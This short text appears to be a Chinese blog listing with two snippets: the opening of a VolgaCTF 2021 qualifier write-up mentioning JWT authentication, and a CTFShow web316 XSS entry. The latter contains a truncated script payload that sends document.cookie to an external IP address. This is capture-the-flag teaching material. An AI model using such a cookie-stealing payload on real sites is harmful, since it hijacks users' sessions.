VolgaCTF2021_Qualifier_WP

前言周日摸鱼打了一下这个比赛,出了四道,一道蹭车,一道最后一秒出,有点可惜. 比国内的题目要有意思一些,带来很多别的思考,(可惜没几道pwn和re 下面是writeup和复现. JWT考察jwt相关, 注册登陆后发现是用JWT鉴权 访问 http://172.105.68.62:8080/secret/ 可以得到密 ......

CTFShow-XSS

web316 反弹cookie到vps123<script>var img = document.createElement("img");img.src = "http://91.67.253.121:1234/?cookie="+document.cookie;a ......
XSS